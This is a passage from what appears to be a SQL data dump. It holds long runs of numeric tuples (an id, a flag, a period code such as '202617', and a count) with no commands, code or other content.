,1,'202616',8),(4529,1,'202616',8),(4694,1,'202616',8),(4700,1,'202616',8),(4753,1,'202616',8),(4792,1,'202616',8),(4870,1,'202616',8),(4883,1,'202616',8),(4996,1,'202616',8),(5037,1,'202616',8),(5058,1,'202616',8),(5128,1,'202616',8),(5248,1,'202616',8),(5256,1,'202616',8),(5317,1,'202616',8),(5409,1,'202616',8),(5412,1,'202616',8),(5567,1,'202616',8),(1596,1,'202616',9),(1707,1,'202616',9),(1720,1,'202616',9),(1734,1,'202616',9),(1737,1,'202616',9),(1782,1,'202616',9),(2165,1,'202616',9),(2748,1,'202616',9),(2769,1,'202616',9),(2964,1,'202616',9),(2991,1,'202616',9),(3083,1,'202616',9),(3124,1,'202616',9),(3243,1,'202616',9),(3275,1,'202616',9),(3307,1,'202616',9),(3486,1,'202616',9),(3746,1,'202616',9),(3777,1,'202616',9),(4301,1,'202616',9),(4373,1,'202616',9),(4542,1,'202616',9),(4582,1,'202616',9),(4608,1,'202616',9),(4651,1,'202616',9),(4654,1,'202616',9),(4660,1,'202616',9),(4685,1,'202616',9),(4691,1,'202616',9),(4750,1,'202616',9),(4797,1,'202616',9),(5067,1,'202616',9),(5122,1,'202616',9),(5131,1,'202616',9),(5140,1,'202616',9),(5268,1,'202616',9),(5356,1,'202616',9),(5378,1,'202616',9),(5449,1,'202616',9),(5467,1,'202616',9),(5472,1,'202616',9),(5582,1,'202616',9),(5683,1,'202616',9),(1600,1,'202616',10),(1699,1,'202616',10),(1751,1,'202616',10),(2063,1,'202616',10),(2154,1,'202616',10),(2178,1,'202616',10),(2297,1,'202616',10),(2617,1,'202616',10),(3027,1,'202616',10),(3030,1,'202616',10),(3069,1,'202616',10),(3092,1,'202616',10),(3226,1,'202616',10),(3251,1,'202616',10),(3253,1,'202616',10),(3282,1,'202616',10),(3290,1,'202616',10),(3534,1,'202616',10),(3724,1,'202616',10),(3749,1,'202616',10),(4238,1,'202616',10),(4275,1,'202616',10),(4363,1,'202616',10),(4368,1,'202616',10),(4428,1,'202616',10),(4444,1,'202616',10),(4862,1,'202616',10),(4897,1,'202616',10),(5042,1,'202616',10),(5054,1,'202616',10),(5125,1,'202616',10),(5146,1,'202616',10),(5264,1,'202616',10),(5276,1,'202616',10),(5353,1,'202616',10),(5359,1,'202616',10),(5515,1,'202616',10),(5578,1,'202616',10),(5585,1,'202616',10),(5666,1,'202616',10),(471,1,'202616',11),(477,1,'202616',11),(478,1,'202616',11),(488,1,'202616',11),(1614,1,'202616',11),(1774,1,'202616',11),(1780,1,'202616',11),(2148,1,'202616',11),(3097,1,'202616',11),(3257,1,'202616',11),(3738,1,'202616',11),(4400,1,'202616',11),(4432,1,'202616',11),(4448,1,'202616',11),(4587,1,'202616',11),(4591,1,'202616',11),(4612,1,'202616',11),(4858,1,'202616',11),(4888,1,'202616',11),(5024,1,'202616',11),(5153,1,'202616',11),(5310,1,'202616',11),(5314,1,'202616',11),(5330,1,'202616',11),(5383,1,'202616',11),(485,1,'202616',12),(1722,1,'202616',12),(1724,1,'202616',12),(1778,1,'202616',12),(2558,1,'202616',12),(2989,1,'202616',12),(4551,1,'202616',12),(4668,1,'202616',12),(4759,1,'202616',12),(4866,1,'202616',12),(4893,1,'202616',12),(4980,1,'202616',12),(5080,1,'202616',12),(5253,1,'202616',12),(5326,1,'202616',12),(5363,1,'202616',12),(5464,1,'202616',12),(476,1,'202616',13),(1592,1,'202616',13),(1770,1,'202616',13),(2159,1,'202616',13),(2457,1,'202616',13),(2751,1,'202616',13),(2775,1,'202616',13),(3265,1,'202616',13),(3297,1,'202616',13),(3710,1,'202616',13),(4396,1,'202616',13),(4424,1,'202616',13),(4524,1,'202616',13),(4697,1,'202616',13),(4802,1,'202616',13),(4878,1,'202616',13),(5163,1,'202616',13),(5374,1,'202616',13),(5512,1,'202616',13),(5561,1,'202616',13),(5570,1,'202616',13),(5605,1,'202616',13),(1584,1,'202616',14),(1604,1,'202616',14),(1608,1,'202616',14),(1747,1,'202616',14),(2309,1,'202616',14),(2658,1,'202616',14),(2704,1,'202616',14),(3102,1,'202616',14),(4722,1,'202616',14),(4874,1,'202616',14),(5020,1,'202616',14),(5307,1,'202616',14),(5441,1,'202616',14),(5457,1,'202616',14),(5662,1,'202616',14),(5674,1,'202616',14),(5696,1,'202616',14),(5762,1,'202616',14),(1544,1,'202616',15),(1586,1,'202616',15),(1588,1,'202616',15),(2813,1,'202616',15),(5601,1,'202616',15),(5771,1,'202616',15),(467,1,'202616',16),(3004,1,'202616',16),(3090,1,'202616',16),(3096,1,'202616',16),(4645,1,'202616',16),(5076,1,'202616',16),(5259,1,'202616',16),(5400,1,'202616',16),(5461,1,'202616',16),(5492,1,'202616',16),(5609,1,'202616',16),(5735,1,'202616',16),(1598,1,'202616',17),(1718,1,'202616',17),(3023,1,'202616',17),(5415,1,'202616',17),(5436,1,'202616',17),(5454,1,'202616',17),(1594,1,'202616',18),(1728,1,'202616',18),(5433,1,'202616',18),(5816,1,'202616',18),(2804,1,'202616',19),(5071,1,'202616',19),(5420,1,'202616',19),(5428,1,'202616',19),(5598,1,'202616',19),(5738,1,'202616',19),(570,1,'202616',20),(4436,1,'202616',20),(5785,1,'202616',20),(5824,1,'202616',20),(487,1,'202616',21),(4335,1,'202616',21),(5157,1,'202616',21),(5626,1,'202616',21),(5828,1,'202616',21),(469,1,'202616',22),(473,1,'202616',22),(1602,1,'202616',22),(5778,1,'202616',22),(5833,1,'202616',22),(4420,1,'202616',23),(4520,1,'202616',23),(5700,1,'202616',23),(5821,1,'202616',23),(5502,1,'202616',24),(4556,1,'202616',26),(5489,1,'202616',26),(335,1,'202616',29),(474,1,'202616',31),(5593,1,'202616',31),(468,1,'202616',32),(74,1,'202616',33),(1582,1,'202616',33),(5406,1,'202616',33),(4930,1,'202616',35),(2503,1,'202616',36),(5769,1,'202616',36),(87,1,'202616',39),(3781,1,'202616',39),(5397,1,'202616',39),(470,1,'202616',40),(5844,1,'202616',40),(108,1,'202616',41),(5847,1,'202616',41),(2904,1,'202616',43),(84,1,'202616',53),(91,1,'202616',55),(76,1,'202616',59),(68,1,'202616',65),(89,1,'202616',68),(72,1,'202616',100),(1741,1,'202616',116),(3541,1,'202616',116),(5859,1,'202616',117),(80,1,'202616',134),(3060,1,'202616',449),(9,1,'202616',4648),(1720,1,'202617',1),(1739,1,'202617',1),(2293,1,'202617',1),(4440,1,'202617',1),(5020,1,'202617',1),(1707,1,'202617',2),(1709,1,'202617',2),(1724,1,'202617',2),(1745,1,'202617',2),(1749,1,'202617',2),(2165,1,'202617',2),(2248,1,'202617',2),(3096,1,'202617',2),(4382,1,'202617',2),(4416,1,'202617',2),(4677,1,'202617',2),(4802,1,'202617',2),(4893,1,'202617',2),(4976,1,'202617',2),(5037,1,'202617',2),(5042,1,'202617',2),(5662,1,'202617',2),(1590,1,'202617',3),(1697,1,'202617',3),(1701,1,'202617',3),(1705,1,'202617',3),(1774,1,'202617',3),(2161,1,'202617',3),(2296,1,'202617',3),(2748,1,'202617',3),(2751,1,'202617',3),(2965,1,'202617',3),(3038,1,'202617',3),(3104,1,'202617',3),(3109,1,'202617',3),(3259,1,'202617',3),(3273,1,'202617',3),(3282,1,'202617',3),(3486,1,'202617',3),(3489,1,'202617',3),(3721,1,'202617',3),(3746,1,'202617',3),(4329,1,'202617',3),(4391,1,'202617',3),(4424,1,'202617',3),(4432,1,'202617',3),(4444,1,'202617',3),(4546,1,'202617',3),(4648,1,'202617',3),(4765,1,'202617',3),(4874,1,'202617',3),(4883,1,'202617',3),(4888,1,'202617',3),(5028,1,'202617',3),(5046,1,'202617',3),(5125,1,'202617',3),(5134,1,'202617',3),(5320,1,'202617',3),(5359,1,'202617',3),(5412,1,'202617',3),(106,1,'202617',4),(1584,1,'202617',4),(1610,1,'202617',4),(1747,1,'202617',4),(1751,1,'202617',4),(1776,1,'202617',4),(2063,1,'202617',4),(2609,1,'202617',4),(2617,1,'202617',4),(2964,1,'202617',4),(2991,1,'202617',4),(2993,1,'202617',4),(3079,1,'202617',4),(3127,1,'202617',4),(3229,1,'202617',4),(3249,1,'202617',4),(3261,1,'202617',4),(3269,1,'202617',4),(3278,1,'202617',4),(3479,1,'202617',4),(3498,1,'202617',4),(4323,1,'202617',4),(4338,1,'202617',4),(4357,1,'202617',4),(4363,1,'202617',4),(4377,1,'202617',4),(4404,1,'202617',4),(4408,1,'202617',4),(4428,1,'202617',4),(4591,1,'202617',4),(4668,1,'202617',4),(4681,1,'202617',4),(4694,1,'202617',4),(4706,1,'202617',4),(4709,1,'202617',4),(4722,1,'202617',4),(4747,1,'202617',4),(4858,1,'202617',4),(4870,1,'202617',4),(4897,1,'202617',4),(4996,1,'202617',4),(5024,1,'202617',4),(5058,1,'202617',4),(5128,1,'202617',4),(5137,1,'202617',4),(5289,1,'202617',4),(5292,1,'202617',4),(5356,1,'202617',4),(5515,1,'202617',4),(480,1,'202617',5),(1592,1,'202617',5),(1594,1,'202617',5),(1600,1,'202617',5),(1695,1,'202617',5),(1711,1,'202617',5),(1722,1,'202617',5),(1730,1,'202617',5),(1734,1,'202617',5),(1741,1,'202617',5),(2150,1,'202617',5),(2156,1,'202617',5),(2252,1,'202617',5),(2457,1,'202617',5),(2809,1,'202617',5),(3090,1,'202617',5),(3226,1,'202617',5),(3240,1,'202617',5),(3243,1,'202617',5),(3247,1,'202617',5),(3265,1,'202617',5),(3285,1,'202617',5),(3287,1,'202617',5),(3482,1,'202617',5),(3541,1,'202617',5),(3714,1,'202617',5),(3731,1,'202617',5),(3738,1,'202617',5),(3771,1,'202617',5),(4275,1,'202617',5),(4326,1,'202617',5),(4332,1,'202617',5),(4373,1,'202617',5),(4448,1,'202617',5),(4542,1,'202617',5),(4654,1,'202617',5),(4691,1,'202617',5),(4744,1,'202617',5),(4771,1,'202617',5),(4862,1,'202617',5),(4866,1,'202617',5),(4878,1,'202617',5),(4977,1,'202617',5),(4983,1,'202617',5),(4988,1,'202617',5),(5050,1,'202617',5),(5054,1,'202617',5),(5062,1,'202617',5),(5101,1,'202617',5),(5140,1,'202617',5),(5276,1,'202617',5),(5301,1,'202617',5),(5561,1,'202617',5),(5570,1,'202617',5),(570,1,'202617',6),(1713,1,'202617',6),(1715,1,'202617',6),(1732,1,'202617',6),(1737,1,'202617',6),(1772,1,'202617',6),(1782,1,'202617',6),(2558,1,'202617',6),(3005,1,'202617',6),(3092,1,'202617',6),(3245,1,'202617',6),(3253,1,'202617',6),(3257,1,'202617',6),(3263,1,'202617',6),(3275,1,'202617',6),(3280,1,'202617',6),(3430,1,'202617',6),(3531,1,'202617',6),(3735,1,'202617',6),(3749,1,'202617',6),(4301,1,'202617',6),(4341,1,'202617',6),(4396,1,'202617',6),(4514,1,'202617',6),(4587,1,'202617',6),(4651,1,'202617',6),(4657,1,'202617',6),(4674,1,'202617',6),(4685,1,'202617',6),(4688,1,'202617',6),(4741,1,'202617',6),(4768,1,'202617',6),(4776,1,'202617',6),(4792,1,'202617',6),(4797,1,'202617',6),(5067,1,'202617',6),(5131,1,'202617',6),(5256,1,'202617',6),(5295,1,'202617',6),(5310,1,'202617',6),(5317,1,'202617',6),(5323,1,'202617',6),(5512,1,'202617',6),(5578,1,'202617',6),(5683,1,'202617',6),(1598,1,'202617',7),(1766,1,'202617',7),(1768,1,'202617',7),(2154,1,'202617',7),(2989,1,'202617',7),(3027,1,'202617',7),(3034,1,'202617',7),(3041,1,'202617',7),(3063,1,'202617',7),(3072,1,'202617',7),(3290,1,'202617',7),(3316,1,'202617',7),(3710,1,'202617',7),(3727,1,'202617',7),(3742,1,'202617',7),(3774,1,'202617',7),(4238,1,'202617',7),(4387,1,'202617',7),(4454,1,'202617',7),(4457,1,'202617',7),(4529,1,'202617',7),(4608,1,'202617',7),(4660,1,'202617',7),(4703,1,'202617',7),(4750,1,'202617',7),(4753,1,'202617',7),(4756,1,'202617',7),(4759,1,'202617',7),(4762,1,'202617',7),(5153,1,'202617',7),(5157,1,'202617',7),(5253,1,'202617',7),(5271,1,'202617',7),(5457,1,'202617',7),(5464,1,'202617',7),(5467,1,'202617',7),(5472,1,'202617',7),(5567,1,'202617',7),(5582,1,'202617',7),(5585,1,'202617',7),(5636,1,'202617',7),(110,1,'202617',8),(482,1,'202617',8),(488,1,'202617',8),(1596,1,'202617',8),(1606,1,'202617',8),(1703,1,'202617',8),(1726,1,'202617',8),(1743,1,'202617',8),(2775,1,'202617',8),(3006,1,'202617',8),(3023,1,'202617',8),(3069,1,'202617',8),(3097,1,'202617',8),(3251,1,'202617',8),(3267,1,'202617',8),(3271,1,'202617',8),(3724,1,'202617',8),(4335,1,'202617',8),(4551,1,'202617',8),(4582,1,'202617',8),(4663,1,'202617',8),(4712,1,'202617',8),(5122,1,'202617',8),(5268,1,'202617',8),(5280,1,'202617',8),(5307,1,'202617',8),(5314,1,'202617',8),(5330,1,'202617',8),(5383,1,'202617',8),(5425,1,'202617',8),(5598,1,'202617',8),(5601,1,'202617',8),(477,1,'202617',9),(478,1,'202617',9),(479,1,'202617',9),(481,1,'202617',9),(1770,1,'202617',9),(2148,1,'202617',9),(2801,1,'202617',9),(2911,1,'202617',9),(3030,1,'202617',9),(3124,1,'202617',9),(3307,1,'202617',9),(3313,1,'202617',9),(3752,1,'202617',9),(3777,1,'202617',9),(4368,1,'202617',9),(4400,1,'202617',9),(4412,1,'202617',9),(4517,1,'202617',9),(4612,1,'202617',9),(4980,1,'202617',9),(5033,1,'202617',9),(5071,1,'202617',9),(5298,1,'202617',9),(5304,1,'202617',9),(5326,1,'202617',9),(5334,1,'202617',9),(5353,1,'202617',9),(5428,1,'202617',9),(5449,1,'202617',9),(5735,1,'202617',9),(484,1,'202617',10),(486,1,'202617',10),(2152,1,'202617',10),(2297,1,'202617',10),(2309,1,'202617',10),(2658,1,'202617',10),(2704,1,'202617',10),(2813,1,'202617',10),(2956,1,'202617',10),(3045,1,'202617',10),(3117,1,'202617',10),(3438,1,'202617',10),(3534,1,'202617',10),(4645,1,'202617',10),(5080,1,'202617',10),(5146,1,'202617',10),(5248,1,'202617',10),(5264,1,'202617',10),(5409,1,'202617',10),(5674,1,'202617',10),(476,1,'202617',11),(1604,1,'202617',11),(1608,1,'202617',11),(1612,1,'202617',11),(1699,1,'202617',11),(1718,1,'202617',11),(3004,1,'202617',11),(3297,1,'202617',11),(4436,1,'202617',11),(4697,1,'202617',11),(5378,1,'202617',11),(5400,1,'202617',11),(5436,1,'202617',11),(5441,1,'202617',11),(5461,1,'202617',11),(5778,1,'202617',11),(483,1,'202617',12),(3764,1,'202617',12),(4524,1,'202617',12),(4700,1,'202617',12),(5415,1,'202617',12),(5454,1,'202617',12),(5816,1,'202617',12),(5828,1,'202617',12),(5844,1,'202617',12),(102,1,'202617',13),(1586,1,'202617',13),(1588,1,'202617',13),(1728,1,'202617',13),(1778,1,'202617',13),(2159,1,'202617',13),(2769,1,'202617',13),(3066,1,'202617',13),(5259,1,'202617',13),(5605,1,'202617',13),(5666,1,'202617',13),(5696,1,'202617',13),(5821,1,'202617',13),(4566,1,'202617',14),(5771,1,'202617',14),(485,1,'202617',15),(5363,1,'202617',15),(5593,1,'202617',15),(5738,1,'202617',15),(471,1,'202617',16),(1544,1,'202617',16),(3083,1,'202617',16),(3102,1,'202617',16),(5489,1,'202617',16),(5700,1,'202617',16),(1614,1,'202617',17),(1780,1,'202617',17),(4420,1,'202617',17),(5420,1,'202617',17),(5609,1,'202617',17),(5626,1,'202617',17),(5762,1,'202617',17),(467,1,'202617',18),(469,1,'202617',18),(487,1,'202617',18),(5502,1,'202617',18),(5833,1,'202617',18),(472,1,'202617',19),(5163,1,'202617',19),(5769,1,'202617',19),(5785,1,'202617',19),(5076,1,'202617',20),(5406,1,'202617',21),(5492,1,'202617',21),(5374,1,'202617',22),(4556,1,'202617',23),(1602,1,'202617',24),(2804,1,'202617',24),(5397,1,'202617',24),(5824,1,'202617',24),(468,1,'202617',25),(5847,1,'202617',25),(473,1,'202617',27),(4520,1,'202617',27),(1582,1,'202617',28),(5433,1,'202617',28),(470,1,'202617',30),(74,1,'202617',36),(2904,1,'202617',36),(474,1,'202617',37),(2503,1,'202617',37),(87,1,'202617',38),(5878,1,'202617',38),(335,1,'202617',40),(3781,1,'202617',40),(4930,1,'202617',41),(5875,1,'202617',44),(91,1,'202617',48),(5868,1,'202617',48),(5865,1,'202617',50),(5872,1,'202617',50),(5859,1,'202617',54),(84,1,'202617',58),(89,1,'202617',61),(108,1,'202617',62),(76,1,'202617',63),(68,1,'202617',65),(3060,1,'202617',99),(72,1,'202617',119),(3087,1,'202617',129),(80,1,'202617',173),(9,1,'202617',4879),(1699,1,'202618',2),(2150,1,'202618',2),(2296,1,'202618',2),(3240,1,'202618',2),(3285,1,'202618',2),(1695,1,'202618',3),(1711,1,'202618',3),(1720,1,'202618',3),(1726,1,'202618',3),(1732,1,'202618',3),(1737,1,'202618',3),(1751,1,'202618',3),(2991,1,'202618',3),(3092,1,'202618',3),(4858,1,'202618',3),(1697,1,'202618',4),(1701,1,'202618',4),(1707,1,'202618',4),(1709,1,'202618',4),(1739,1,'202618',4),(1749,1,'202618',4),(1768,1,'202618',4),(1776,1,'202618',4),(2148,1,'202618',4),(2152,1,'202618',4),(2293,1,'202618',4),(2558,1,'202618',4),(2748,1,'202618',4),(2993,1,'202618',4),(3247,1,'202618',4),(3257,1,'202618',4),(3263,1,'202618',4),(3486,1,'202618',4),(3531,1,'202618',4),(3534,1,'202618',4),(3541,1,'202618',4),(3742,1,'202618',4),(4373,1,'202618',4),(4377,1,'202618',4),(4542,1,'202618',4),(4648,1,'202618',4),(4668,1,'202618',4),(4797,1,'202618',4),(4862,1,'202618',4),(4888,1,'202618',4),(110,1,'202618',5),(1722,1,'202618',5),(1766,1,'202618',5),(1772,1,'202618',5),(2154,1,'202618',5),(2156,1,'202618',5),(2161,1,'202618',5),(2165,1,'202618',5),(2248,1,'202618',5),(2609,1,'202618',5),(2658,1,'202618',5),(3045,1,'202618',5),(3072,1,'202618',5),(3243,1,'202618',5),(3273,1,'202618',5),(3430,1,'202618',5),(3489,1,'202618',5),(3498,1,'202618',5),(3714,1,'202618',5),(3724,1,'202618',5),(3727,1,'202618',5),(3771,1,'202618',5),(3777,1,'202618',5),(4275,1,'202618',5),(4341,1,'202618',5),(4382,1,'202618',5),(4412,1,'202618',5),(4428,1,'202618',5),(4440,1,'202618',5),(4514,1,'202618',5),(4517,1,'202618',5),(4546,1,'202618',5),(4566,1,'202618',5),(4750,1,'202618',5),(4792,1,'202618',5),(4883,1,'202618',5),(4897,1,'202618',5),(5046,1,'202618',5),(5320,1,'202618',5),(5323,1,'202618',5),(102,1,'202618',6),(106,1,'202618',6),(570,1,'202618',6),(1703,1,'202618',6),(1730,1,'202618',6),(1734,1,'202618',6),(1745,1,'202618',6),(1782,1,'202618',6),(2252,1,'202618',6),(2617,1,'202618',6),(2751,1,'202618',6),(2813,1,'202618',6),(3063,1,'202618',6),(3066,1,'202618',6),(3096,1,'202618',6),(3261,1,'202618',6),(3265,1,'202618',6),(3271,1,'202618',6),(3275,1,'202618',6),(3280,1,'202618',6),(3287,1,'202618',6),(3316,1,'202618',6),(3735,1,'202618',6),(4357,1,'202618',6),(4391,1,'202618',6),(4404,1,'202618',6),(4408,1,'202618',6),(4424,1,'202618',6),(4432,1,'202618',6),(4436,1,'202618',6),(4454,1,'202618',6),(4524,1,'202618',6),(4660,1,'202618',6),(4674,1,'202618',6),(4681,1,'202618',6),(4685,1,'202618',6),(4744,1,'202618',6),(4768,1,'202618',6),(5020,1,'202618',6),(5128,1,'202618',6),(5131,1,'202618',6),(5146,1,'202618',6),(5256,1,'202618',6),(5268,1,'202618',6),(478,1,'202618',7),(480,1,'202618',7),(1741,1,'202618',7),(2063,1,'202618',7),(2911,1,'202618',7),(2956,1,'202618',7),(3004,1,'202618',7),(3079,1,'202618',7),(3102,1,'202618',7),(3127,1,'202618',7),(3267,1,'202618',7),(3278,1,'202618',7),(3313,1,'202618',7),(3721,1,'202618',7),(3746,1,'202618',7),(4368,1,'202618',7),(4444,1,'202618',7),(4591,1,'202618',7),(4645,1,'202618',7),(4651,1,'202618',7),(4654,1,'202618',7),(4657,1,'202618',7),(4700,1,'202618',7),(4706,1,'202618',7),(4712,1,'202618',7),(4741,1,'202618',7),(4759,1,'202618',7),(4866,1,'202618',7),(4878,1,'202618',7),(4980,1,'202618',7),(4983,1,'202618',7),(4996,1,'202618',7),(5125,1,'202618',7),(5137,1,'202618',7),(5157,1,'202618',7),(5276,1,'202618',7),(5292,1,'202618',7),(5383,1,'202618',7),(486,1,'202618',8),(1705,1,'202618',8),(1715,1,'202618',8),(1743,1,'202618',8),(1774,1,'202618',8),(2178,1,'202618',8),(2309,1,'202618',8),(2775,1,'202618',8),(2964,1,'202618',8),(2989,1,'202618',8),(3005,1,'202618',8),(3038,1,'202618',8),(3097,1,'202618',8),(3117,1,'202618',8),(3226,1,'202618',8),(3245,1,'202618',8),(3282,1,'202618',8),(3438,1,'202618',8),(3731,1,'202618',8),(3738,1,'202618',8),(4332,1,'202618',8),(4363,1,'202618',8),(4387,1,'202618',8),(4529,1,'202618',8),(4551,1,'202618',8),(4582,1,'202618',8),(4694,1,'202618',8),(4709,1,'202618',8),(4756,1,'202618',8),(4762,1,'202618',8),(4765,1,'202618',8),(4870,1,'202618',8),(5024,1,'202618',8),(5028,1,'202618',8),(5042,1,'202618',8),(5050,1,'202618',8),(5122,1,'202618',8),(5134,1,'202618',8),(5140,1,'202618',8),(5289,1,'202618',8),(5295,1,'202618',8),(5301,1,'202618',8),(5317,1,'202618',8),(5334,1,'202618',8),(5359,1,'202618',8),(5636,1,'202618',8),(481,1,'202618',9),(482,1,'202618',9),(484,1,'202618',9),(1718,1,'202618',9),(1770,1,'202618',9),(1780,1,'202618',9),(2801,1,'202618',9),(2809,1,'202618',9),(3023,1,'202618',9),(3027,1,'202618',9),(3034,1,'202618',9),(3041,1,'202618',9),(3090,1,'202618',9),(3107,1,'202618',9),(3229,1,'202618',9),(3249,1,'202618',9),(3259,1,'202618',9),(3269,1,'202618',9),(3479,1,'202618',9),(3482,1,'202618',9),(3710,1,'202618',9),(3774,1,'202618',9),(4323,1,'202618',9),(4416,1,'202618',9),(4663,1,'202618',9),(4691,1,'202618',9),(4697,1,'202618',9),(4753,1,'202618',9),(4771,1,'202618',9),(4802,1,'202618',9),(4893,1,'202618',9),(4976,1,'202618',9),(4988,1,'202618',9),(5037,1,'202618',9),(5058,1,'202618',9),(5062,1,'202618',9),(5248,1,'202618',9),(5271,1,'202618',9),(5356,1,'202618',9),(468,1,'202618',10),(477,1,'202618',10),(483,1,'202618',10),(488,1,'202618',10),(1610,1,'202618',10),(1713,1,'202618',10),(1728,1,'202618',10),(2159,1,'202618',10),(2965,1,'202618',10),(3069,1,'202618',10),(3104,1,'202618',10),(3109,1,'202618',10),(3290,1,'202618',10),(3307,1,'202618',10),(3752,1,'202618',10),(3764,1,'202618',10),(4338,1,'202618',10),(4400,1,'202618',10),(4457,1,'202618',10),(4608,1,'202618',10),(4688,1,'202618',10),(4747,1,'202618',10),(4776,1,'202618',10),(5080,1,'202618',10),(5253,1,'202618',10),(5264,1,'202618',10),(5353,1,'202618',10),(5374,1,'202618',10),(5415,1,'202618',10),(5582,1,'202618',10),(5585,1,'202618',10),(5666,1,'202618',10),(467,1,'202618',11),(469,1,'202618',11),(2297,1,'202618',11),(2457,1,'202618',11),(3124,1,'202618',11),(4301,1,'202618',11),(4326,1,'202618',11),(4677,1,'202618',11),(4722,1,'202618',11),(5054,1,'202618',11),(5101,1,'202618',11),(5310,1,'202618',11),(5314,1,'202618',11),(5570,1,'202618',11),(5821,1,'202618',11),(470,1,'202618',12),(473,1,'202618',12),(479,1,'202618',12),(485,1,'202618',12),(1596,1,'202618',12),(1600,1,'202618',12),(1604,1,'202618',12),(1612,1,'202618',12),(2704,1,'202618',12),(3251,1,'202618',12),(4329,1,'202618',12),(4448,1,'202618',12),(4587,1,'202618',12),(4703,1,'202618',12),(4977,1,'202618',12),(5280,1,'202618',12),(5378,1,'202618',12),(5425,1,'202618',12),(5578,1,'202618',12),(471,1,'202618',13),(1544,1,'202618',13),(3253,1,'202618',13),(4335,1,'202618',13),(4520,1,'202618',13),(4874,1,'202618',13),(5033,1,'202618',13),(5153,1,'202618',13),(5326,1,'202618',13),(5467,1,'202618',13),(5472,1,'202618',13),(5512,1,'202618',13),(5561,1,'202618',13),(5609,1,'202618',13),(5626,1,'202618',13),(5771,1,'202618',13),(1584,1,'202618',14),(1590,1,'202618',14),(1592,1,'202618',14),(1594,1,'202618',14),(1598,1,'202618',14),(2769,1,'202618',14),(3030,1,'202618',14),(3297,1,'202618',14),(4420,1,'202618',14),(5067,1,'202618',14),(5259,1,'202618',14),(5330,1,'202618',14),(5363,1,'202618',14),(5454,1,'202618',14),(5457,1,'202618',14),(5515,1,'202618',14),(5662,1,'202618',14),(5674,1,'202618',14),(5683,1,'202618',14),(5816,1,'202618',14),(487,1,'202618',15),(1778,1,'202618',15),(3006,1,'202618',15),(5304,1,'202618',15),(5307,1,'202618',15),(5428,1,'202618',15),(5492,1,'202618',15),(5833,1,'202618',15),(5868,1,'202618',15),(476,1,'202618',16),(1588,1,'202618',16),(1606,1,'202618',16),(3083,1,'202618',16),(3749,1,'202618',16),(4396,1,'202618',16),(5298,1,'202618',16),(5409,1,'202618',16),(5412,1,'202618',16),(5449,1,'202618',16),(5461,1,'202618',16),(5567,1,'202618',16),(5785,1,'202618',16),(74,1,'202618',17),(1614,1,'202618',17),(5433,1,'202618',17),(5464,1,'202618',17),(5601,1,'202618',17),(5844,1,'202618',17),(472,1,'202618',18),(1724,1,'202618',18),(4612,1,'202618',18),(5700,1,'202618',18),(5738,1,'202618',18),(5828,1,'202618',18),(474,1,'202618',19),(5071,1,'202618',19),(5441,1,'202618',19),(5598,1,'202618',19),(5696,1,'202618',19),(1586,1,'202618',20),(2804,1,'202618',20),(5605,1,'202618',20),(1608,1,'202618',21),(5778,1,'202618',21),(2904,1,'202618',22),(5163,1,'202618',22),(5735,1,'202618',22),(5762,1,'202618',22),(5875,1,'202618',22),(5400,1,'202618',23),(5859,1,'202618',23),(5865,1,'202618',23),(4238,1,'202618',24),(4556,1,'202618',24),(5420,1,'202618',24),(5489,1,'202618',24),(5502,1,'202618',24),(5406,1,'202618',25),(5436,1,'202618',25),(5824,1,'202618',25),(5878,1,'202618',25),(87,1,'202618',26),(5847,1,'202618',26),(4930,1,'202618',27),(335,1,'202618',28),(1602,1,'202618',30),(3781,1,'202618',30),(2503,1,'202618',31),(5593,1,'202618',32),(5397,1,'202618',34),(5872,1,'202618',34),(1582,1,'202618',36),(91,1,'202618',37),(5769,1,'202618',37),(108,1,'202618',38),(5881,1,'202618',42),(76,1,'202618',44),(5076,1,'202618',49),(3060,1,'202618',53),(5884,1,'202618',55),(89,1,'202618',65),(68,1,'202618',66),(1747,1,'202618',66),(84,1,'202618',81),(80,1,'202618',140),(72,1,'202618',152),(3087,1,'202618',173),(9,1,'202618',4792),(5889,1,'202619',1),(106,1,'202619',3),(110,1,'202619',4),(481,1,'202619',4),(3261,1,'202619',4),(3771,1,'202619',4),(5330,1,'202619',4),(1745,1,'202619',5),(1751,1,'202619',5),(2161,1,'202619',5),(4323,1,'202619',5),(4329,1,'202619',5),(4440,1,'202619',5),(4883,1,'202619',5),(5359,1,'202619',5),(5662,1,'202619',5),(482,1,'202619',6),(488,1,'202619',6),(1699,1,'202619',6),(1749,1,'202619',6),(3226,1,'202619',6),(4391,1,'202619',6),(4681,1,'202619',6),(4888,1,'202619',6),(4983,1,'202619',6),(5037,1,'202619',6),(5317,1,'202619',6),(5425,1,'202619',6),(5472,1,'202619',6),(1695,1,'202619',7),(1734,1,'202619',7),(1737,1,'202619',7),(1782,1,'202619',7),(2063,1,'202619',7),(2150,1,'202619',7),(2293,1,'202619',7),(2991,1,'202619',7),(3005,1,'202619',7),(3072,1,'202619',7),(3092,1,'202619',7),(3229,1,'202619',7),(3263,1,'202619',7),(3275,1,'202619',7),(3280,1,'202619',7),(3498,1,'202619',7),(3714,1,'202619',7),(4373,1,'202619',7),(4428,1,'202619',7),(4432,1,'202619',7),(4712,1,'202619',7),(4756,1,'202619',7),(4893,1,'202619',7),(5020,1,'202619',7),(5024,1,'202619',7),(5046,1,'202619',7),(5054,1,'202619',7),(5153,1,'202619',7),(5163,1,'202619',7),(5289,1,'202619',7),(5461,1,'202619',7),(5598,1,'202619',7),(5636,1,'202619',7),(5666,1,'202619',7),(477,1,'202619',8),(478,1,'202619',8),(480,1,'202619',8),(484,1,'202619',8),(486,1,'202619',8),(1697,1,'202619',8),(1711,1,'202619',8),(1720,1,'202619',8),(1774,1,'202619',8),(2152,1,'202619',8),(2178,1,'202619',8),(2751,1,'202619',8),(2801,1,'202619',8),(3257,1,'202619',8),(3273,1,'202619',8),(3282,1,'202619',8),(3287,1,'202619',8),(3710,1,'202619',8),(4332,1,'202619',8),(4338,1,'202619',8),(4382,1,'202619',8),(4387,1,'202619',8),(4436,1,'202619',8),(4529,1,'202619',8),(4546,1,'202619',8),(4608,1,'202619',8),(4657,1,'202619',8),(4660,1,'202619',8),(4663,1,'202619',8),(4691,1,'202619',8),(4802,1,'202619',8),(4858,1,'202619',8),(4878,1,'202619',8),(4976,1,'202619',8),(4988,1,'202619',8),(4996,1,'202619',8),(5042,1,'202619',8),(5067,1,'202619',8),(5125,1,'202619',8),(5248,1,'202619',8),(5253,1,'202619',8),(5280,1,'202619',8),(5295,1,'202619',8),(5298,1,'202619',8),(5356,1,'202619',8),(5412,1,'202619',8),(5428,1,'202619',8),(102,1,'202619',9),(1590